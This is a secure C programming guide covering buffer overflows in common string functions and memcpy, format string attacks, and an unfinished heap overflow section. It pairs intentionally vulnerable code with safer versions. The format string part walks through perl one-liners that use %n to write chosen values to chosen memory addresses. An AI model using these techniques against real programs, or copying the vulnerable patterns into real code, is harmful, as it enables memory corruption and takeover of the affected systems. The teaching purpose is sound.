
Secure C Programming Guidelines

Buffer Overflows
By far one of the most common security vulnerabilities, buffer overflows run rampant in
many of today’s applications. Surprisingly enough, this problem is not new, and in many
cases has existed in the same operating systems and applications for decades (such as
some UNIX variants). The frequency with which this type of problem is being discovered
and exploited in mission critical software has grown significantly within the past decade.
This isn’t because the problems didn’t exist, but because this type of attack required a
higher level of sophistication than the average attacker possessed – and most creators and
users of the technology were previously not interested in exploiting it to begin with.
Today, with cookie-cutter instructions on how to take advantage of these problems, and
the sheer increase in the number of miscreants, minimal expertise is required.
A buffer overflow occurs when a piece of data is copied into a location in memory that
is not large enough to hold it. The copy succeeds, but memory outside the boundary of
the target buffer is also overwritten. Variables in a program are allocated either on the
program's stack or on the program's heap, so it is common to hear the terms stack
overflow and heap overflow. While both types of overflow can be exploited, the stack
overflow is in many cases much easier.

strcpy – copies strings
char * strcpy(char *dst, const char *src)
The strcpy() and strncpy() functions copy the string src to dst (including the terminating
‘\0’ character).
/*
Example code and discussion of the insecure use of strcpy
From [1] Smashing The Stack For Fun And Profit
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

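void func(char *str)
{
    char buffer[16];

    /* No bounds check: copies until the terminating '\0' in str. */
    strcpy(buffer, str);
    return;
}

int main()
{
    char large_string[256];
    int i;

    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';   /* terminate the string so strcpy() has an end to find */
    func(large_string);
    exit(0);
}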

Running this program results in the following:


bash-2.04$ ./strcpy-example
Segmentation fault (core dumped)

Why do we get a segmentation violation? strcpy() is copying the contents of *str
(large_string[]) into buffer[] until a null character is found in the string. As we can see,
buffer[] is much smaller than *str. buffer[] is 16 bytes long, and we are trying to stuff it
with 256 bytes. This means that the 240 bytes after buffer on the stack are being
overwritten. This includes the saved frame pointer (SFP), the return address (RET), and
even *str! We had filled large_string with the character ‘A’. Its hex character value is
0x41. That means that the return address is now 0x41414141. This is outside of the
process address space. That is why, when the function returns and tries to read the next
instruction from that address, you get a segmentation violation.
So a buffer overflow allows us to change the return address of a function. In this way we
can change the flow of execution of the program.
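The overflow in func() happens because nothing compares the length of str with the size of buffer. A minimal sketch of such a check follows. The helper name copy_checked() is our own invention for illustration; it is not part of the original example or of the C library.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst only if it fits, including the '\0'.
   Returns 0 on success, -1 if src is too long (dst is left as an empty string). */
int copy_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    if (dstsize == 0)
        return -1;
    len = strlen(src);
    if (len >= dstsize) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);   /* len + 1 copies the terminating '\0' too */
    return 0;
}
```

With a 16-byte buffer, a call such as copy_checked(buffer, sizeof(buffer), str) would reject the 255-character string instead of writing past the end of buffer.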
Examining the stack with [2]GDB (The GNU Debugger):
bash-2.04$ gdb
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
(gdb) core strcpy-example.core
Core was generated by `strcpy-example'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0xbfbffa70 -1077937552
ecx 0xbfbffb78 -1077937288
edx 0xbfbffbb8 -1077937224
ebx 0x1 1
esp 0xbfbffa88 0xbfbffa88
ebp 0x41414141 0x41414141
esi 0xbfbffc04 -1077937148
edi 0xbfbffc0c -1077937140
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb)

strncpy
char * strncpy(char *dst, const char *src, size_t len)
The strncpy() function copies not more than len characters into dst, appending ‘\0’ characters if src
is less than len characters long, and not terminating dst if src is more than len characters
long.
/* Example program showing secure alternative to strcpy */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

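void function(char *str)
{
    char buffer[256];

    /* Copy at most sizeof(buffer) - 1 bytes, then terminate explicitly,
       because strncpy() does not add '\0' when src is too long. */
    strncpy(buffer, str, sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';
    return;
}

int main()
{
    char large_string[256];
    int i;

    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';   /* terminate the source string */
    function(large_string);
    exit(0);
}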
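The two behaviours described above (padding with ‘\0’ when src is short, and no termination when src is long) are easy to get wrong, so it can help to wrap them once. This is only a sketch; copy_truncating() is a hypothetical name of our own.

```c
#include <string.h>

/* Hypothetical helper: strncpy() plus explicit termination.
   Returns 1 if src had to be truncated to fit, 0 otherwise. */
int copy_truncating(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return 1;
    strncpy(dst, src, dstsize - 1);   /* pads with '\0' if src is short */
    dst[dstsize - 1] = '\0';          /* needed when src is too long */
    return strlen(src) >= dstsize;
}
```

Returning a truncation flag lets the caller decide whether silently shortened data is acceptable, which is often a security question in itself.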

strcat – concatenates strings
char * strcat(char *s, const char *append)
The strcat() and strncat() functions append a copy of the null-terminated string append to
the end of the null-terminated string s, then add a terminating ‘\0’. The strcat() function,
much like strcpy(), does not perform any length checking on the string which it will
append to. Use strncat() to restrict the length of data copied.

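#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void function(char *str)
{
    char buffer[256];

    buffer[0] = '\0';   /* strcat() needs a terminated string to append to */
    /* No length check: overflows whenever
       strlen(buffer) + strlen(str) >= sizeof(buffer). */
    strcat(buffer, str);
    return;
}

int main()
{
    char large_string[256];
    int i;

    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';   /* terminate the source string */
    function(large_string);
    exit(0);
}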

strncat
char * strncat(char *s, const char *append, size_t count)
The strncat() function appends not more than count characters from append, and then
adds a terminating ‘\0’.

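#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void function(char *str)
{
    char buffer[256];

    buffer[0] = '\0';   /* strncat() appends, so start from an empty string */
    /* count is the space still free in buffer, minus one for the '\0'
       that strncat() always adds */
    strncat(buffer, str, sizeof(buffer) - strlen(buffer) - 1);
    return;
}

int main()
{
    char large_string[256];
    int i;

    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';   /* terminate the source string */
    function(large_string);
    exit(0);
}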
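A common mistake with strncat() is to pass the total size of the destination as count, when it should be the space that is still free. The sketch below computes that remaining space explicitly. The helper name append_bounded() is hypothetical and not taken from any library.

```c
#include <string.h>

/* Hypothetical helper: append src to the string already stored in dst.
   Returns 0 if everything fit, -1 if src was truncated or dst was not
   a terminated string to begin with. */
int append_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t used = 0;
    size_t room;

    while (used < dstsize && dst[used] != '\0')   /* bounded strlen(dst) */
        used++;
    if (used == dstsize)
        return -1;                 /* no '\0' found inside dst */
    room = dstsize - used - 1;     /* free space, excluding the '\0' */
    strncat(dst, src, room);
    return strlen(src) > room ? -1 : 0;
}
```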

sprintf – writes formatted output to the character string str
int sprintf(char *str, const char *format, ...)
sprintf() and vsprintf() effectively assume that str has infinite size.
/*
Example program showing insecure use of sprintf function
Based on code snippet from: [3] Secure Programming v1.00
Changes: The code snippet has been transformed into a complete program and the buffer
length has been modified to overwrite eip
*/
#include <stdlib.h>
#include <stdio.h>
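void function(char *str)
{
    char buffer[250];

    /* No size limit: output longer than 249 characters overflows buffer. */
    sprintf(buffer, "%s", str);
    return;
}

int main()
{
    char large_string[276];   /* room for 275 characters plus '\0' */
    int i;

    for (i = 0; i < 275; i++)
        large_string[i] = 'A';
    large_string[275] = '\0';
    function(large_string);
    exit(0);
}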

snprintf
int snprintf(char *str, size_t size, const char *format, ...)
snprintf() and vsnprintf() will write at most size-1 of the characters printed into the output
string (the size’th character then obtains the terminating ‘\0’); if the return value is greater
than or equal to the size argument, the string was too short and some of the printed
characters were discarded.
#include <stdlib.h>
#include <stdio.h>
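void function(char *str)
{
    char buffer[250];

    /* Writes at most sizeof(buffer) - 1 characters plus the terminating '\0'. */
    snprintf(buffer, sizeof(buffer), "%s", str);
    return;
}

int main()
{
    char large_string[276];
    int i;

    for (i = 0; i < 275; i++)
        large_string[i] = 'A';
    large_string[275] = '\0';
    function(large_string);
    exit(0);
}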
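The return value described above is what tells you whether output was discarded. A minimal sketch of checking it, assuming a C99-conforming snprintf(); the helper name format_checked() is our own:

```c
#include <stdio.h>

/* Hypothetical helper: format str into buffer and report truncation.
   Returns 0 if the whole string fit, -1 on truncation or output error. */
int format_checked(char *buffer, size_t size, const char *str)
{
    int n = snprintf(buffer, size, "%s", str);

    if (n < 0)
        return -1;            /* output error */
    if ((size_t)n >= size)
        return -1;            /* some characters were discarded */
    return 0;
}
```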

gets - get a line from a stream
char * gets(char *str)
The gets() function is equivalent to fgets() with an infinite size and a stream of stdin,
except that the newline character (if any) is not stored in the string. It is the caller’s
responsibility to ensure that the input line, if any, is sufficiently short to fit in the string.
The gets() function is inherently flawed and should never be used. gets() has no provision
for specifying a length, so any input line longer than the buffer causes an overflow. It was
removed from the C standard in C11.
#include <stdlib.h>
#include <stdio.h>

int main()
{
    char buffer[5];

    printf("Input a line of data (buffer is 5 bytes)\n");
    gets(buffer);   /* insecure: there is no way to limit how much is read */
    printf("You typed: %s \n", buffer);
    exit(0);
}
When compiled on FreeBSD 4.3-BETA gcc will even warn you of the dangers of gets()
as shown:
bash-2.04$ gcc -o gets-example gets-example.c
/tmp/ccIaqkz3.o: In function `main':
/tmp/ccIaqkz3.o(.text+0x1e): warning: this program uses gets(), which is unsafe.
bash-2.04$

fgets
char * fgets(char *str, int size, FILE *stream)
The fgets() function reads at most one less than the number of characters specified by
size from the given stream and stores them in the string str. Reading stops when a
newline character is found, at end-of-file or error. The newline, if any, is retained. If any
characters are read and there is no error, a ‘\0’ character is appended to end the string.
#include <stdlib.h>
#include <stdio.h>

int main()
{
    char buffer[256];

    printf("Input a line of data (buffer is 256 bytes)\n");
    /* fgets() already reserves one byte for the '\0', so pass the full size */
    fgets(buffer, sizeof(buffer), stdin);
    printf("You typed: %s\n", buffer);
    exit(0);
}
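Because fgets() keeps the newline and silently stops at the size limit, callers usually want to strip the newline and know whether a line was cut short. The following is a sketch under those assumptions; read_line() is a hypothetical helper, not a standard function.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: read one line into buf, dropping the newline.
   Returns 0 on success, -1 on end-of-file or error, and 1 if the line
   was too long (the rest of that line is read and discarded). */
int read_line(FILE *stream, char *buf, size_t size)
{
    size_t len;
    int c;

    if (size == 0 || fgets(buf, (int)size, stream) == NULL)
        return -1;
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    /* No newline stored: the line hit the size limit or input ended. */
    c = getc(stream);
    if (c == EOF || c == '\n')
        return 0;                 /* the line ended exactly at the limit */
    while (c != '\n' && c != EOF) /* discard the rest of the long line */
        c = getc(stream);
    return 1;
}
```

Discarding the tail of an over-long line keeps the next call from treating it as a separate line of input.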

fscanf, scanf, sscanf


The scanf() family of functions scans input according to a format.
int fscanf(FILE *stream, const char *format, ...)

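#include <stdlib.h>
#include <stdio.h>

int main()
{
    char buffer[256];
    int num;

    /* Insecure: "%s" has no field width, so a long token overflows buffer. */
    num = fscanf(stdin, "%s", buffer);
    exit(0);
}

The example above places no limit on how much is read. In the following example, a field
width of 255 ensures that at most 255 characters are stored in the buffer, leaving room
for the terminating ‘\0’.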

#include <stdlib.h>
#include <stdio.h>

int main()
{
    char buffer[256];
    int num;

    num = fscanf(stdin, "%255s", buffer);
    exit(0);
}
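A hard-coded width such as 255 can drift out of step with the buffer size when the code is edited later. One way to tie them together is to build the format string from a single constant. This is a sketch: MAXTOKEN, STR() and read_token() are names we made up, and sscanf() is used in place of fscanf() only so the example needs no input stream.

```c
#include <stdio.h>

#define MAXTOKEN 15                 /* longest token we accept */
#define STR_(x) #x
#define STR(x) STR_(x)              /* expands MAXTOKEN before stringifying */

/* Hypothetical helper: read one whitespace-delimited token from input.
   out must have room for MAXTOKEN + 1 bytes. Returns 1 on success, else 0. */
int read_token(const char *input, char out[MAXTOKEN + 1])
{
    /* The format string becomes "%15s" at compile time. */
    return sscanf(input, "%" STR(MAXTOKEN) "s", out) == 1;
}
```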
memcpy – copies byte strings
void * memcpy(void *dst, const void *src, size_t len)
There have been a few instances where overflows have occurred due to unsafe usage of
the memcpy() function. This may occur when the length specified to the memcpy()
function can be manipulated by an outside source. It is important to ensure that the
length is not larger than the memory structure being copied into. A good example of how
an overflow like this can occur is illustrated as follows:
unsigned long copyaddress(struct hostent *hp) {
    unsigned long address;

    /* Insecure: hp->h_length comes from the DNS reply and is never checked. */
    memcpy(&address, hp->h_addr_list[0], hp->h_length);
    return address;
}

The above example is taken from an actual vulnerability that was present in the BIND
(Berkeley Internet Name Domain) distribution, and resulted in a number of
vulnerabilities in various programs. It has been simplified for the purpose of this
example. The above function copies hp->h_length bytes into the ‘address’
variable (which is 4 bytes). Under normal circumstances, hp->h_length will always be 4,
since that is the size of an internet address. If, however, an attacker can manipulate the
h_length variable, which is possible by spoofing a DNS reply, he can make the
length larger and pass in more data via the hp->h_addr_list variable. This will cause
more than 4 bytes to be copied into the ‘address’ variable, overflowing the variable and
overwriting adjacent data on the stack.

Always ensure that you check the length before performing such an action. For example:

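unsigned long copyaddress(struct hostent *hp) {
    unsigned long address = 0;

    /* Reject lengths that are negative or larger than the destination. */
    if (hp->h_length < 0 || (size_t)hp->h_length > sizeof(address))
        return 0;
    memcpy(&address, hp->h_addr_list[0], hp->h_length);
    return address;
}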
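The same check can be factored out so it is not forgotten at other call sites. The sketch below is our own illustration, not code from BIND; memcpy_checked() is a hypothetical name, and the length is deliberately a signed int to mirror h_length.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: memcpy() that refuses a length larger than the
   destination. Returns 0 on success, -1 if len is negative or too large. */
int memcpy_checked(void *dst, size_t dstsize, const void *src, int len)
{
    if (len < 0 || (size_t)len > dstsize)
        return -1;
    memcpy(dst, src, (size_t)len);
    return 0;
}
```

Checking for a negative length first matters: converted to size_t, a negative int becomes a very large value.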

Format Strings
What is a Format String Attack?
Format string bugs come from the same dark corner as many other security
holes: The laziness of programmers. Somewhere out there right now, as this
document is being read, there is a programmer writing code. His task: to
print out a string or copy it to some buffer. What he means to write is
something like:
printf("%s", str);
but instead he decides that he can save time, effort and 6 bytes of source code by typing:
printf(str);
Why not? Why bother with the extra printf argument and the time it takes to parse
through that silly format? The first argument to printf is a string to be printed anyway!
Because the programmer has just unknowingly opened a security hole that allows an
attacker to control the execution of the program, that’s why!
What did the programmer do that was so wrong? He passed in a string that he wanted
printed verbatim. Instead, the string is interpreted by the printf function as a format
string. It is scanned for special format characters such as “%d”. As formats are
encountered, a variable number of argument values are retrieved from the stack. At the
least, it should be obvious that an attacker can peek into the memory of the program by
printing out these values stored on the stack. What may not be as obvious is that this
simple mistake gives away enough control to allow an arbitrary value to be written into
the memory of the running program.
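When the goal really is to print a string verbatim, a function that does no format parsing at all removes the problem. A minimal sketch using fputs(); the wrapper name print_verbatim() is hypothetical:

```c
#include <stdio.h>

/* Hypothetical helper: print str exactly as given.
   fputs() does no format parsing, so "%x" or "%n" in str is just text.
   Returns 0 on success, -1 on a write error. */
int print_verbatim(FILE *out, const char *str)
{
    return fputs(str, out) == EOF ? -1 : 0;
}
```

Calling print_verbatim(stdout, str) has the same visible effect as printf("%s", str), without ever treating str as a format.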

Printf – What they forgot to tell you in school
Before getting into the details of how to abuse printf for our own
purposes, we should have a firm grasp of the features printf provides. It
is assumed that the reader has used printf functions before and knows
about its normal formatting features, such as how to print integers and
strings, and how to specify minimum and maximum string widths. In addition
to these more mundane features, there are a few esoteric and little-known
features. Of these features, the following are of particular relevance to
us:
It is possible to get a count of the number of characters output at any point in the format
string. When the “%n” format is encountered in the format string, the number of
characters output before the %n field was encountered is stored at the address passed in
the next argument. As an example, to receive the offset to the space between two
formatted numbers:

int pos, x = 235, y = 93;

printf("%d %n%d\n", x, &pos, y);
printf("The offset was %d\n", pos);

The “%n” format returns the number of characters that should have been output, not the
actual count of characters that were output. When formatting a string into a fixed-size
buffer, the output string may be truncated. Despite this truncation, the offset returned by
the “%n” format will reflect what the offset would have been if the string was not
truncated. To illustrate this point, the following code will output the value “100” and not
“20”:

char buf[20];
int pos, x = 0;

snprintf(buf, sizeof buf, "%.100d%n", x, &pos);
printf("position: %d\n", pos);
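The same "would have been output" count can be observed without “%n”, through the return value of snprintf(). The sketch below assumes a C99-conforming snprintf(); format_wide() is a name we made up for illustration.

```c
#include <stdio.h>

/* Returns the number of characters "%.100d" would produce for x,
   while storing at most size - 1 of them (plus '\0') in buf. */
int format_wide(char *buf, size_t size, int x)
{
    return snprintf(buf, size, "%.100d", x);
}
```

With a 20-byte buffer and x equal to zero, only 19 characters are stored, yet the returned count is 100, matching what “%n” reports in the example above.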

A Simple Example:
Rather than talking in vagaries and abstractions, we will use a concrete
example to illustrate the principles as they are discussed. The following
simple program will suffice for this purpose:
/*
fmtme.c
Format a value into a fixed-size buffer
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[100];
    int x;

    if (argc != 2)
        exit(1);
    x = 1;
    snprintf(buf, sizeof buf, argv[1]);   /* the bug: user input is the format string */
    buf[sizeof buf - 1] = 0;
    printf("buffer (%d): %s\n", (int)strlen(buf), buf);
    printf("x is %d/%#x (@ %p)\n", x, x, (void *)&x);
    return 0;
}

A few notes about this program are in order. First, the general purpose
is quite simple: A value passed on the command line is formatted into a
fixed-length buffer. Care is taken to make sure the buffer limits are not
exceeded. After the buffer is formatted, it is output. In addition to
formatting the argument, a second integer value is set and later output.
This variable will be used as the target of attacks later. For now, it
should be noted that its value should always be one.
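For contrast, here is a sketch of how the formatting step in fmtme.c could be written so that the command-line value is treated as data. The function names format_into() and format_user_text() are hypothetical. The format attribute is a GCC/Clang extension that lets the compiler check format strings passed to a wrapper; on other compilers the macro expands to nothing.

```c
#include <stdarg.h>
#include <stdio.h>

#if defined(__GNUC__)
#define PRINTF_LIKE(fmt_idx, arg_idx) \
    __attribute__((format(printf, fmt_idx, arg_idx)))
#else
#define PRINTF_LIKE(fmt_idx, arg_idx)   /* no checking on other compilers */
#endif

/* Hypothetical printf-style wrapper; the attribute marks argument 3 as the
   format string and argument 4 as the first value it consumes. */
int format_into(char *buf, size_t size, const char *fmt, ...) PRINTF_LIKE(3, 4);

int format_into(char *buf, size_t size, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(buf, size, fmt, ap);
    va_end(ap);
    return n;
}

/* User-supplied text is passed as an argument, never as the format. */
int format_user_text(char *buf, size_t size, const char *user_text)
{
    return format_into(buf, size, "%s", user_text);
}
```

Compiling with GCC's -Wformat-security option is one way to have calls such as snprintf(buf, sizeof buf, argv[1]) flagged at build time.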
All examples in this document were actually performed on an x86 BSD/OS 4.1 box. If
you have been on a mission to Mozambique for the last 20 years and are unfamiliar with
the x86, it is a little-endian machine. This will be reflected in the examples when multi-
precision numbers are expressed as a series of byte values. The actual numbers used here
will vary from system to system with differences in architecture, operating system,
environment and even command line length. The examples should be easily adjusted to
work on other x86 machines. With some effort and thought, they may be made to work
on other architectures as well.

Format Me!
It is now time to put on our black hats and start thinking like attackers.
We have in our hands a test program. We know that it has a vulnerability
and we know where the programmer made his mistake. We are also armed with
a thorough knowledge of the printf function and what it can do for us. Let’s
get to work by tinkering with our program.
Starting off simple, we invoke the program with normal arguments. Let’s begin with this:
% ./fmtme "hello world"
buffer (11): hello world
x is 1/0x1 (@ 0x804745c)

There’s nothing special going on here. The program formatted our string
into the buffer and then printed its length and the value out. It also told
us that the variable x has the value one (shown in decimal and hex) and that
it was stored at the address 0x804745c.
Next, let’s try providing some format directives. In this example we’ll print out the
integers on the stack above the format string:
% ./fmtme "%x %x %x %x"
buffer (15): 1 f31 1031 3133
x is 1/0x1 (@ 0x804745c)

A quick analysis of the program will reveal that the stack layout of the
program when the snprintf function is called is:
Address   Contents          Description
fp+8      Buffer pointer    4-byte address
fp+12     Buffer length     4-byte integer
fp+16     Format string     4-byte address
fp+20     Variable x        4-byte integer
fp+24     Variable buf      100 characters

The four values output in the previous test were the next four arguments on
the stack after the format string: the variable x, then three 4-byte
integers taken from the uninitialized buf variable.
Now it is time for an epiphany. As an attacker, we control the values stored in the buffer.
These values are also used as arguments to the snprintf call!
Let’s verify this with a quick test:
% ./fmtme "aaaa %x %x"
buffer (15): aaaa 1 61616161
x is 1/0x1 (@ 0x804745c)

Yup! The four ‘a’ characters we provided were copied to the start of the
buffer and then interpreted by snprintf as an integer argument with the
value 0x61616161 (‘a’ is 0x61 in ASCII).
X MARKS THE SPOT
All the pieces are falling into place! It is time to step up our attack
from passive probes to actively altering the state of the program.
Remember that variable “x”? Let’s try to change its value. To do this, we
will have to enter its address into one of snprintf’s arguments. We will
then have to skip over the first argument to snprintf, which is the
variable x, and finally, use a “%n” format to write to the address we
specified. This sounds more complicated than it actually is. An example
should clarify things. [Note: We’re using PERL here to execute the program
which allows us to easily place arbitrary characters in the command line
arguments]:
% perl -e 'system "./fmtme", "\x58\x74\x04\x08%d%n"'
buffer (5): X1
x is 5/0x5 (@ 0x8047458)

The value of x changed, but exactly what is going on here? The arguments
to snprintf look something like this:
snprintf(buf, sizeof buf, "\x58\x74\x04\x08%d%n", x, 4 bytes from buf)
First, snprintf copies the first four bytes into buf. Next it scans the “%d” format and
prints out the value of x. Finally it reaches the “%n” directive. This pulls the next value
off the stack, which comes from the first four bytes of buf. These four bytes have just
been filled with “\x58\x74\x04\x08”, or, interpreted as an integer, 0x08047458. Snprintf
then writes the number of bytes output so far, five, into this address. As it turns out, that
address is the address of the variable x. This is no coincidence. We carefully chose the
value 0x08047458 by previous examination of the program. In this case, the program was
helpful in printing out the address we were interested in. More typically, this value would
have to be discovered with the aid of a debugger.
Well, great! We can pick an arbitrary address (well, almost arbitrary; as long as the
address contains no NUL characters) and write a value into it. But can we write a useful
value into it? Snprintf will only write out the number of characters output so far. If we
want to write out a small value greater than four then the solution is quite simple: Pad out
the format string until we get the right value. But what about larger values? Here is where
we take advantage of the fact that “%n” will count the number of characters that should
have been output if there was no truncation:
% perl -e 'system "./fmtme", "\x54\x74\x04\x08%.500d%n"'
buffer (99): %0000000 ... 0000
x is 504/0x1f8 (@ 0x8047454)

The value that “%n” wrote to x was 504, much larger than the 99 characters
actually emitted to buf. We can provide arbitrarily large values by just
specifying a large field width [1]. And what about small values? We can
construct arbitrary values (even the value zero), by piecing together
several writes. If we write out four numbers at one-byte offsets, we can
construct an arbitrary integer out of the four least-significant bytes. To
illustrate this, consider the following four writes:
Address        A     A+1   A+2   A+3   A+4   A+5   A+6
Write to A:    0x11  0x11  0x11  0x11
Write to A+1:        0x22  0x22  0x22  0x22
Write to A+2:              0x33  0x33  0x33  0x33
Write to A+3:                    0x44  0x44  0x44  0x44
Memory:        0x11  0x22  0x33  0x44  0x44  0x44  0x44

After the four writes are completed, the integer value 0x44332211 is left
in memory at address A, composed of the least-significant byte of the four
writes. This technique gives us flexibility in choosing values to write, but
it does have some drawbacks: It takes four times as many writes to set the
value. It overwrites three bytes neighboring the target address. It also
performs three unaligned write operations. Since some architectures do not
support unaligned writes, this technique is not universally applicable.
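The arithmetic in the table can be checked by replaying the four overlapping writes on an ordinary local byte array. This is purely a simulation of the byte layout on a little-endian machine: mem[0] stands for address A, and the helper names are our own.

```c
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value at p in little-endian byte order, as an x86 would. */
static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Read a 32-bit little-endian value from p. */
static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Replays the four writes from the table on a 7-byte array and
   returns the integer left at offset 0 (address A). */
uint32_t four_writes(unsigned char mem[7])
{
    memset(mem, 0, 7);
    store_le32(mem + 0, 0x11111111u);   /* write to A   */
    store_le32(mem + 1, 0x22222222u);   /* write to A+1 */
    store_le32(mem + 2, 0x33333333u);   /* write to A+2 */
    store_le32(mem + 3, 0x44444444u);   /* write to A+3 */
    return load_le32(mem);
}
```

Each later write overwrites all but the lowest byte of the one before it, which is why only the least-significant byte of each write survives, and why the three bytes at A+4 through A+6 are clobbered as a side effect.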
SO WHAT?
So what? So what!? SO WHAT!#@?? So you can write arbitrary values to (almost
any) arbitrary addresses in memory!!! Surely you can think of a good use
for this. Let’s see:
Overwrite a stored UID for a program that drops and elevates privileges.
Overwrite an executed command.
Overwrite a return address to point to some buffer with shell code in it.

Heap Overflows
Prelude:
Heap/BSS-based overflows are fairly common in applications today; yet,
they are rarely reported. Therefore, we felt it was appropriate to
present a "heap overflow" tutorial. The biggest critics of this article
will probably be those who argue heap overflows have been around for a
while. Of course they have, but that doesn't negate the need for such
material.

In this article, we will refer to "overflows involving the stack" as
"stack-based overflows" ("stack overflow" is misleading) and "overflows
involving the heap" as "heap-based overflows".

This article should provide the following: a better understanding
of heap-based overflows along with several methods of exploitation,
demonstrations, and some possible solutions/fixes. Prerequisites to
this article: a general understanding of computer architecture,
assembly, C, and stack overflows.

This is a collection of the insights we have gained through our research
with heap-based overflows and the like. We have written all the
examples and exploits included in this article; therefore, the copyright
applies to them as well.

Why Heap/BSS Overflows are Significant


As more system vendors add non-executable stack patches, or individuals
apply their own patches (e.g., Solar Designer's non-executable stack
patch), a different method of penetration is needed by security
consultants (or else, we won't have jobs!). Let me give you a few
examples:

1. Searching for the word "heap" on BugTraq (for the archive, see
www.geek-girl.com/bugtraq), yields only 40+ matches, whereas
"stack" yields 2300+ matches (though several are irrelevant). Also,
"stack overflow" gives twice as many matches as "heap" does.

2. As of Solaris 2.6, SPARC Solaris (an OS developed by Sun
Microsystems) includes a "protect_stack" option, but not an
equivalent "protect_heap" option. Fortunately, the bss is not
executable (and need not be).

3. There is a "StackGuard" (developed by Crispin Cowan et al.), but
no equivalent "HeapGuard".

4. Using a heap/bss-based overflow was one of the "potential" methods
of getting around StackGuard. The following was posted to BugTraq
by Tim Newsham several months ago:

> Finally the precomputed canary values may be a target
> themselves. If there is an overflow in the data or bss segments
> preceding the precomputed canary vector, an attacker can simply
> overwrite all the canary values with a single value of his
> choosing, effectively turning off stack protection.

5. Some people have actually suggested making a "local" buffer a
"static" buffer, as a fix! This is not very wise; yet, it is a fairly
common misconception of how the heap or bss work.

Although heap-based overflows are not new, they don't seem to be well
understood.

Note:
One argument is that the presentation of a "heap-based overflow" is
equivalent to a "stack-based overflow" presentation. However, only a
small proportion of this article has the same presentation (if you
will) that is equivalent to that of a "stack-based overflow".

People go out of their way to prevent stack-based overflows, but leave
their heap/bss completely open! On most systems, the heap and bss are
both executable and writeable (an excellent combination). This makes
heap/bss overflows very possible. But, I don't see any reason for the
bss to be executable! What is going to be executed in zero-filled
memory?!

For the security consultant (the ones doing the penetration assessment),
most heap-based overflows are system and architecture independent,
including those with non-executable heaps. This will all be demonstrated
in the "Exploiting Heap/BSS Overflows" section.

Terminology

An executable file, such as an ELF (Executable and Linking Format)
executable, has several "sections", such as: the
PLT (Procedure Linkage Table), GOT (Global Offset Table), init
(instructions executed on initialization), fini (instructions to be
executed upon termination), and ctors and dtors (which contain global
constructors/destructors).

"Memory that is dynamically allocated by the application is known as the
heap." The words "by the application" are important here, as on good
systems most areas are in fact dynamically allocated at the kernel level,
while for the heap, the allocation is requested by the application.

Heap and Data/BSS Sections


The heap is an area in memory that is dynamically allocated by the
application. The data section is initialized at compile-time.

The bss section contains uninitialized data, and is allocated at
run-time. Until it is written to, it remains zeroed (or at least from
the application's point-of-view).

Note:
When we refer to a "heap-based overflow" in the sections below, we are
most likely referring to buffer overflows of both the heap and data/bss
sections.

On most systems, the heap grows up (towards higher addresses). Hence,
when we say "X is below Y," it means X is lower in memory than Y.
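The difference between the data and bss sections can be seen from C itself. In the sketch below, the assignment of each variable to a section reflects what a typical ELF toolchain does and is an assumption on our part; the C language only guarantees the values, not the section names. All identifiers are made up for illustration.

```c
#include <stddef.h>

#define TABLE_SIZE 64

static int initialized_table[4] = {1, 2, 3, 4};   /* typically the data section */
static char zeroed_table[TABLE_SIZE];             /* typically the bss section */

/* Returns 1 if every byte of the uninitialized static array is zero. */
int bss_is_zeroed(void)
{
    size_t i;

    for (i = 0; i < TABLE_SIZE; i++)
        if (zeroed_table[i] != 0)
            return 0;
    return 1;
}

/* Returns the sum of the values that were fixed at compile time. */
int data_sum(void)
{
    int sum = 0;
    size_t i;

    for (i = 0; i < 4; i++)
        sum += initialized_table[i];
    return sum;
}
```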

Exploiting Heap/BSS Overflows

In this section, we'll cover several different methods to put heap/bss
overflows to use. Most of the examples for Unix-derived x86 systems will
also work in DOS and Windows (with a few changes). We've also included
a few DOS/Windows specific exploitation methods. An advance warning:
this will be the longest section, and should be studied the most.

Note:
In this article, I use the "exact offset" approach. The offset
must be closely approximated to its actual value. The alternative is
"stack-based overflow approach" (if you will), where one repeats the
addresses to increase the likelihood of a successful exploit.

While this example may seem unnecessary, we're including a quick
demonstration for those who are unfamiliar with heap-based overflows:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h> /* u_long, u_int */

#define BUFSIZE 16
